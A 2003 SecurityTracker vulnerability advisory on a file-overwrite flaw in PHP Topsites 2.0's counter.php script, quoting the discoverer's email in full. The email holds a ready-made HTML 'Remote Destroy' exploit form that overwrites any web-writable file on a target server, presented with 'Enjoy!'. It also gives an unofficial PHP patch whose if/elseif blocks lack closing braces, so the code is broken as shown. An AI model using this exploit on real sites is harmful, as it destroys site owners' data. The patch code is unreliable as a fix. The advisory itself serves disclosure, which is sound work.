PHP Topsites 'counter.php' Input Validation Flaw Lets Remote Users Modify Files on the System
|
|
SecurityTracker Alert ID: 1006368 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Mar 24 2003
|
Impact: Denial of service via network, Modification of system information, Modification of user information
|
Exploit Included: Yes
|
Version(s): 2.0
|
Description: Trent Pb reported a vulnerability in PHP Topsites. A remote user can modify some files on the server.
A remote user can reportedly specify an arbitrary file name for the 'count_log_file' variable to cause the counter.php script to
overwrite the specified file with a series of numbers.
[Editor's note: The report does not indicate if a relative path or absolute
path to another directory is permitted or not.]
A demonstration exploit web form is provided in the Source Message.
Skull
Hacker is credited with discoving this flaw.
|
Impact: A remote user can overwrite files on the target system that are writable by the web server process.
|
Solution: No vendor solution was available at the time of this entry. The author of the report has provided an unofficial patch for the counter.php file, available in the Source Message.
|
Vendor URL: www.itop10.net/products/ (Links to External Site)
|
Cause: Access control error, Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: "Trent Pb" <trent_pb@hotmail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 24 Mar 2003 19:04:10 +0800
From: "Trent Pb" <trent_pb@hotmail.com>
Subject: PHP TopSites 2.0 Remote Destroy Exploit
|
This is a multi-part message in MIME format.
--------------3542974A5DB0CAD12B39B9BF
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Hello i found this exploit in PHP Topsites 2.0 all the info is in the text
file - Thanx !
_________________________________________________________________
MSN Instant Messenger now available on Australian mobile phones. Go to
http://ninemsn.com.au/mobilecentral/hotmail_messenger.asp
--------------3542974A5DB0CAD12B39B9BF
Content-Type: text/plain; charset=us-ascii;
name="Topsites.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="Topsites.txt"
---------------------------------------------------------------
PHP Topsites 2.0 Remote Destroy Exploit
Discovered By Skull Hacker 24/3/03
---------------------------------------------------------------
Greetz, I found a vulnrebility in counter.php on PHP Topsites 2.0 a remote
attacker can open and replace a file off thier choice on the server with
lines of numbers. I have included a patch and exploit as seen below.
Exploit:
Simply change the URL too the Vulnrible TopSite URL save, run and click
destroy !
<HTML>
<HEAD>
<TITLE>PHP Topsites 2.0 Remote Destroy Exploit. Found By Skull
Hacker</TITLE>
</HEAD>
<BODY>
<P><B><FONT FACE="Arial">PHP
Topsites 2.0 Remote Destroy Exploit
- Discovered By Skull Hacker
<FONT SIZE="1">
<A HREF="mailto:skull_hacker@hackersof2000.net">
skull_hacker@hackersof2000.net</A>
.<BR>
<BR>
</FONT><FONT SIZE="2">Click
destroy and the Topsites will then be
fully erased and replaced with
numbers. Enjoy ! note: Change the count_log_file=index.php too any file u
want too overwrite on the server.<BR>
</FONT></FONT></B></P>
<FORM METHOD="POST"
ACTION="http://www.sitetoohack.com/counter.php?count_log_file=index.php">
<INPUT TYPE="submit" VALUE="Destroy" NAME="B1"></P>
</FORM>
</BODY>
</HTML>
Patch:
Open counter.php and replace all of it with this and remember too change the
log file in this patch.
<?
$count_log_file = "--Your Log File--"; // Patch For TopSites 2.0 counter.php
Remote Destroy Exploit By Skull Hacker.
$counter_file_line = file($count_log_file);
$counter_file_line[0] = $counter_file_line[0]+1;
$cf = fopen($count_log_file, "w");
flock($cf,2);
fputs($cf, "$counter_file_line[0]");
fclose($cf);
$display = $counter_file_line[0];
if ($counter_file_line[0] >= 10000000) {
$display = round(($counter_file_line[0]/1000000))."M";
elseif ($counter_file_line[0] >= 100000) {
$display = round(($counter_file_line[0]/1000))."K";
echo $display;
?>
--------------3542974A5DB0CAD12B39B9BF--
|
|
